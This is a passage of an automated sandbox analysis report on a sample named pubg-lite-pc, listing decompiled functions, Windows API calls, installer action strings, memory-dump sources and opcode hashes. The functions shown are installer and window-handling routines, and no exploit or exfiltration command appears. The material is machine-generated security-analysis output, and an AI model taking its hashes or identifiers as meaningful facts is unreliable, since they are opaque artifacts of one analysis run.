					_t4 = RtlAllocateHeap( *0x6d9efd84, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = L6D9A044E();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = L6D995ABE(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}





                                                                                                0x6d9970c4
                                                                                                0x6d9970ca
                                                                                                0x6d9970fc
                                                                                                0x6d997101
                                                                                                0x6d997107
                                                                                                0x00000000
                                                                                                0x6d997107
                                                                                                0x6d9970ce
                                                                                                0x6d9970d0
                                                                                                0x6d9970d0
                                                                                                0x6d9970e7
                                                                                                0x6d9970f0
                                                                                                0x6d9970f8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9970d8
                                                                                                0x6d9970da
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9970e3
                                                                                                0x6d9970e5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9970e5
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000001,6D96CD5C,?,6D98B75D,6D96CD5E,6D96CD5C,?,?,?,6D97CE5C,6D96CD60,6D96CD60), ref: 6D9970F0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 3eaeb7d7e878c47fa564c67ca6420dd2f4c31e74d5b03e024e1ac5dc299069b5
                                                                                                • Instruction ID: 5e239e84e063d95bec98d7bdc50b8edb4b7db721efa14a33d76ebad4ec530e1f
                                                                                                • Opcode Fuzzy Hash: 3eaeb7d7e878c47fa564c67ca6420dd2f4c31e74d5b03e024e1ac5dc299069b5
                                                                                                • Instruction Fuzzy Hash: 17E09B3194921397EB231A66DC1576B7A6CAF576A4F0E4111DD689E1C4DF60C80042E5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A57ED6 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 713a8bb969eff2a5997c6f63a2221b6cd874ef0f8ad3da1a1cc494f2a5d0a508
                                                                                                • Instruction ID: 616ec656d655006f5118b578d99b9ad9f2dd648eac73d023e6aff21ef9c2f865
                                                                                                • Opcode Fuzzy Hash: 713a8bb969eff2a5997c6f63a2221b6cd874ef0f8ad3da1a1cc494f2a5d0a508
                                                                                                • Instruction Fuzzy Hash: CCE0C232A8573467CB31AB22EC06B5F3A9CBF40B92B0580127C017B2A0CE70EC0CC5E0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00927DE0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindCloseChangeNotification.KERNEL32(?), ref: 00927DEB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ChangeCloseFindNotification
                                                                                                • String ID:
                                                                                                • API String ID: 2591292051-0
                                                                                                • Opcode ID: a8df9844e3ca82fccc4e25a743a0c4f0a3695e6b60889accefbb1d136aaf175b
                                                                                                • Instruction ID: 7d60cd1c6b536be2d934f0eb8f364c418bd6199aea81b91e7ea95b0bc9213531
                                                                                                • Opcode Fuzzy Hash: a8df9844e3ca82fccc4e25a743a0c4f0a3695e6b60889accefbb1d136aaf175b
                                                                                                • Instruction Fuzzy Hash: 38C04C7164562147D730DB58B90875276DC9F04711F15485AA45AD3644CAB4DC418655
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Function 00922010 Relevance: 289.4, Strings: 229, Instructions: 3121COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandle
                                                                                                • String ID: 100$100$100$100$10000$10000$10000$100000$100000$12000$12000$12000$12000$12000$12000$12000$12000$12000$12000$12000$12000$12000$120000$120000$1500$1500$1500$1500$1500$15000$15000$15000$15000$15000$15000$15000$15000$1500000$1500000$1800$1800$1800$2000$2000$2000$2000$2000$2000$2000$2000$2000$20000$20000$200000$200000$3000$3000$3000$3000$3000$3000$3000$3000$3000$3000$3000$3000$3000$3000$3000$3000$30000$30000$30000$30000$3000000$3000000$500$500$5000$5000$6000$6000$800$800$8000$8000$8000$8000$8000$AI_AppSearchEx$AI_ChainProductsPseudo$AI_CountRowAction$AI_DefaultActionCost$AI_DownloadPrereq$AI_ExtractPrereq$AI_Game$AI_Game$AI_Game$AI_GxInstall$AI_GxUninstall$AI_InstallPostPrerequisite$AI_InstallPrerequisite$AI_PreRequisite$AI_ProcessAccounts$AI_ProcessGroups$AI_ProcessTasks$AI_ScheduledTasks$AI_UninstallAccounts$AI_UninstallGroups$AI_UninstallTasks$AI_UserAccounts$AI_UserGroups$AI_XmlAttribute$AI_XmlElement$AI_XmlInstall$AI_XmlUninstall$AppId$AppId$AppId$AppSearch$BindImage$Complus$Complus$Complus$Component$Component_$CostFinalize$CostInitialize$CreateFolder$CreateFolders$CreateShortcuts$DuplicateFile$DuplicateFiles$Environment$Extension$Feature$Feature$Feature$Feature_$File$File$File$File$FileCost$FileSize$Font$Font$Font$IniFile$IniFile$IniFile$InstallFiles$InstallFinalize$InstallInitialize$InstallODBC$InstallServices$InstallValidate$Location$MIME$MIME$MIME$MoveFile$MoveFiles$MsiAssembly$MsiConfigureServices$MsiPublishAssemblies$MsiUnpublishAssemblies$ODBCDataSource$ODBCDriver$ODBCTranslator$Options$Options$Options$Patch$Patch$PatchFiles$PatchSize$ProcessComponents$ProgId$ProgId$ProgId$PublishComponent$PublishComponents$PublishFeatures$RegisterClassInfo$RegisterComPlus$RegisterExtensionInfo$RegisterFonts$RegisterMIMEInfo$RegisterProgIdInfo$RegisterTypeLibraries$Registry$RemoveDuplicateFiles$RemoveEnvironmentStrings$RemoveExistingProducts$RemoveFile$RemoveFiles$RemoveFolders$RemoveIniFile$RemoveIniValues$RemoveODBC$RemoveRegistry$RemoveRegistryValues$RemoveShortcuts$SelfReg$SelfReg$SelfReg$SelfRegModules$SelfUnregModules$ServiceControl$ServiceInstall$Shortcut$StartServices$StopServices$TypeLib$TypeLib$UnpublishComponents$UnpublishFeatures$UnregisterClassInfo$UnregisterComPlus$UnregisterExtensionInfo$UnregisterFonts$UnregisterMIMEInfo$UnregisterProgIdInfo$WriteEnvironmentStrings$WriteIniValues$WriteRegistryValues$~
                                                                                                • API String ID: 2962429428-3108495574
                                                                                                • Opcode ID: 3bd7b2f5aa24a6429998922fd584b10d840ac050549827d5caaaa36c02d46c8c
                                                                                                • Instruction ID: 9e090c325e26f1bb526193cfdc2a2a0a21d35f1767ea66b4428addbb32df86e9
                                                                                                • Opcode Fuzzy Hash: 3bd7b2f5aa24a6429998922fd584b10d840ac050549827d5caaaa36c02d46c8c
                                                                                                • Instruction Fuzzy Hash: A963A3706443C4EEE700EBE4EC59B7A7AA1EB91718F104A9CE2902F3F1CBB51546C796
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009D6A50 Relevance: 30.0, Strings: 23, Instructions: 1201COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: HeapProcess
                                                                                                • String ID: %s%d$BasicUiCommandLine$CommandLine$ExactSize$Folder$LanguageList$MD5$NoUiCommandLine$OpenSite$Operator$Options$ParentPrereq$RefContent$RetValPropName$SearchCmdLine$SearchString$SearchType$SetupFile$Url$VerMax$VerMin$WinNT64Versions$WinNTVersions
                                                                                                • API String ID: 54951025-2110401129
                                                                                                • Opcode ID: 906bb7576452fddb7210dc83e60cb8a7c6f1d1ef7ef987f1fa97e95183d6bb67
                                                                                                • Instruction ID: ff0181c9219f2c5d84944ab059a15bf2afba894f8e18385687effcdfbb665b85
                                                                                                • Opcode Fuzzy Hash: 906bb7576452fddb7210dc83e60cb8a7c6f1d1ef7ef987f1fa97e95183d6bb67
                                                                                                • Instruction Fuzzy Hash: D9A2A330641606ABDB10DFADC8957AEF7A9BF50320F14C62AE425D73D6EB70D945CB80
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00961540 Relevance: 24.6, APIs: 16, Instructions: 576nativewindowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ShowWindow.USER32(?,00000000,F4D3B90A,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00961594
                                                                                                • ShowWindow.USER32(?,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009615C0
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 009615F2
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00961610
                                                                                                • NtdllDefWindowProc_W.NTDLL(?,0000000C,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00961623
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0096163A
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00961669
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00961687
                                                                                                • NtdllDefWindowProc_W.NTDLL(?,00000080,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096169D
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 009616B4
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0096176B
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00961789
                                                                                                • NtdllDefWindowProc_W.NTDLL(?,00000086,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0096179B
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 009617AD
                                                                                                • GetWindowRect.USER32(?,?), ref: 00961850
                                                                                                • SendMessageW.USER32(?,00000112,0000F060,00000000), ref: 00961A2D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Long$NtdllProc_$Show$MessageRectSend
                                                                                                • String ID:
                                                                                                • API String ID: 4041393160-0
                                                                                                • Opcode ID: cdd0dced52fcc33b54089fec7870830022f654c36d1769579be26522513f36c1
                                                                                                • Instruction ID: 51df4361e72ba13578d89555abcf6a5dff575c8ff449dd3ed706c3742e372680
                                                                                                • Opcode Fuzzy Hash: cdd0dced52fcc33b54089fec7870830022f654c36d1769579be26522513f36c1
                                                                                                • Instruction Fuzzy Hash: BB328E74A00215EFDF24CFA8C988BADBBB5FF49310F284559E911A73A0DB75AD40CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009374D0 Relevance: 21.5, APIs: 14, Instructions: 532COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0093757B
                                                                                                • ShowWindow.USER32(00000000,?), ref: 0093759A
                                                                                                • SetWindowLongW.USER32(?,000000EB,00000000), ref: 009375A8
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 009375BF
                                                                                                • ShowWindow.USER32(00000000,?), ref: 009375E0
                                                                                                • SetWindowLongW.USER32(?,000000EB,?), ref: 009375F7
                                                                                                  • Part of subcall function 009311F0: RaiseException.KERNEL32(00000000,00000000,00000000,00000000,00A4308A,C000008C,00000001,?,00A430BB,00000000,?,009351A7,00000000,F4D3B90A,000000FF,?), ref: 009311FC
                                                                                                • ShowWindow.USER32(?,?), ref: 00937743
                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00937771
                                                                                                • ShowWindow.USER32(?,?), ref: 0093778E
                                                                                                • GetWindowRect.USER32(?,?), ref: 009377B3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$LongShow$Rect$ExceptionRaise
                                                                                                • String ID:
                                                                                                • API String ID: 777556035-0
                                                                                                • Opcode ID: 408d5d349b113036f0b3d129f813c5a424c7ddad39caea2092340c3c136e874b
                                                                                                • Instruction ID: edd8973b4c09978782402a9cf14b40e379abc6cce6bb111f9453963b2a780eee
                                                                                                • Opcode Fuzzy Hash: 408d5d349b113036f0b3d129f813c5a424c7ddad39caea2092340c3c136e874b
                                                                                                • Instruction Fuzzy Hash: 811249B19086059FDB25CFA8C984BAABBF6FF99304F044A1DF48697260DB30E945CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0092DA10 Relevance: 21.4, APIs: 14, Instructions: 374nativememoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0092DE70: EnterCriticalSection.KERNEL32(00B0380C,F4D3B90A,00000000,?,?,?,?,?,?,0092D6D0,00A671AD,000000FF), ref: 0092DEAD
                                                                                                  • Part of subcall function 0092DE70: LoadCursorW.USER32(00000000,00007F00), ref: 0092DF28
                                                                                                  • Part of subcall function 0092DE70: LoadCursorW.USER32(00000000,00007F00), ref: 0092DFCE
                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0092DAB3
                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0092DBBB
                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0092DBCB
                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0092DBD6
                                                                                                • NtdllDefWindowProc_W.NTDLL(?,?,00000001,?), ref: 0092DBE4
                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0092DBF2
                                                                                                • SetWindowTextW.USER32(?,00AA9988), ref: 0092DC91
                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 0092DCC8
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0092DCD6
                                                                                                • GlobalUnlock.KERNEL32(?), ref: 0092DCFA
                                                                                                • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0092DD81
                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0092DD96
                                                                                                • NtdllDefWindowProc_W.NTDLL(?,?,?,00000000), ref: 0092DDDD
                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0092DE05
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Long$FreeGlobalString$CursorLoadNtdllProc_$AllocCriticalEnterLockSectionTextUnlock
                                                                                                • String ID:
                                                                                                • API String ID: 1808742688-0
                                                                                                • Opcode ID: ad6f31a4bfa2f9a3a7689fdca7301ed14a66d810d1bf7093f7e2b83b8eba9c76
                                                                                                • Instruction ID: 7455f56c15f3715c67838dabf47015c387f7ea01a1b8041ab686ff5450cec923
                                                                                                • Opcode Fuzzy Hash: ad6f31a4bfa2f9a3a7689fdca7301ed14a66d810d1bf7093f7e2b83b8eba9c76
                                                                                                • Instruction Fuzzy Hash: 7ED1E171A02219EFDB10DFA4DC48BAFBBB8EF55310F144158F811AB294DB799E05CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009BB850 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 420fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 009292F0: GetProcessHeap.KERNEL32 ref: 00929345
                                                                                                • FindFirstFileW.KERNEL32(?,?,?,00000001), ref: 009BBBF2
                                                                                                • FindClose.KERNEL32(00000000), ref: 009BBC20
                                                                                                • FindClose.KERNEL32(00000000), ref: 009BBCA9
                                                                                                Strings
                                                                                                • No acceptable version found. Operating System not supported., xrefs: 009BC08B
                                                                                                • No acceptable version found. It must be installed from package., xrefs: 009BC076
                                                                                                • No acceptable version found., xrefs: 009BC099
                                                                                                • An acceptable version was found., xrefs: 009BC06F
                                                                                                • No acceptable version found. It must be downloaded manually from a site., xrefs: 009BC084
                                                                                                • Not selected for install., xrefs: 009BC0A0
                                                                                                • No acceptable version found. It must be downloaded., xrefs: 009BC07D
                                                                                                • No acceptable version found. It is already downloaded and it will be installed., xrefs: 009BC092
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$Close$FileFirstHeapProcess
                                                                                                • String ID: An acceptable version was found.$No acceptable version found.$No acceptable version found. It is already downloaded and it will be installed.$No acceptable version found. It must be downloaded manually from a site.$No acceptable version found. It must be downloaded.$No acceptable version found. It must be installed from package.$No acceptable version found. Operating System not supported.$Not selected for install.
                                                                                                • API String ID: 4254541338-749633484
                                                                                                • Opcode ID: c4e0b7aa4086e6637508d4de918a0243648fc5574eff4b6d98025378d4d0d626
                                                                                                • Instruction ID: 9028a0e074ccebf0255f4f8890f000943a4af3e68cffbe6d12cffaea27a61aa1
                                                                                                • Opcode Fuzzy Hash: c4e0b7aa4086e6637508d4de918a0243648fc5574eff4b6d98025378d4d0d626
                                                                                                • Instruction Fuzzy Hash: 74F1AD70900609CFDB20DF68CA887AEFBF5EF85320F148698D4599B392DB749E45CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009B7E80 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 422fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindClose.KERNEL32(00000000), ref: 009B7EDF
                                                                                                • PathIsUNCW.SHLWAPI(F4D3B90A,*.*), ref: 009B7F43
                                                                                                • FindFirstFileW.KERNEL32(F4D3B90A,00000001,*.*), ref: 009B818B
                                                                                                • GetFullPathNameW.KERNEL32(F4D3B90A,00000000,00000000,00000000), ref: 009B81A5
                                                                                                • GetFullPathNameW.KERNEL32(F4D3B90A,00000000,00000000,00000000), ref: 009B81D9
                                                                                                • FindClose.KERNEL32(00000000), ref: 009B824A
                                                                                                • SetLastError.KERNEL32(0000007B), ref: 009B8254
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: FindPath$CloseFullName$ErrorFileFirstLast
                                                                                                • String ID: *.*$\\?\$\\?\UNC\
                                                                                                • API String ID: 539638818-1700010636
                                                                                                • Opcode ID: 857ffe9542031a3c1a3fb9a253bec1dc1c6f6d9e701dd9f88e6483ecfb55f1c9
                                                                                                • Instruction ID: 7664e99dc2e895cc4e924d54bcbd03767a7587bda0f464bfc295bc196c534580
                                                                                                • Opcode Fuzzy Hash: 857ffe9542031a3c1a3fb9a253bec1dc1c6f6d9e701dd9f88e6483ecfb55f1c9
                                                                                                • Instruction Fuzzy Hash: 02F1F470A01512DFDB14DF68CE49BAFB7E9FF88720F148269E8159B2A5DB349D01CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00949740 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 246windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateWindowExW.USER32(00000000,tooltips_class32,00000000,80000063,80000000,80000000,80000000,80000000,?,00000000,00000000,F4D3B90A), ref: 009497CF
                                                                                                  • Part of subcall function 0092F630: SetWindowLongW.USER32(?,000000FC,00000000), ref: 0092F666
                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 0094991C
                                                                                                • SendMessageW.USER32(00000000,00000439,00000000,0000002C), ref: 00949930
                                                                                                • SendMessageW.USER32(00000000,00000421,00000003,?), ref: 00949945
                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,0000012C), ref: 0094995A
                                                                                                • SendMessageW.USER32(?,000000D6,-00000001,00000000), ref: 00949971
                                                                                                • GetWindowRect.USER32(?,?), ref: 009499A3
                                                                                                • SendMessageW.USER32(00000000,00000412,00000000), ref: 00949A05
                                                                                                • SendMessageW.USER32(00000000,00000411,00000001,0000002C), ref: 00949A15
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
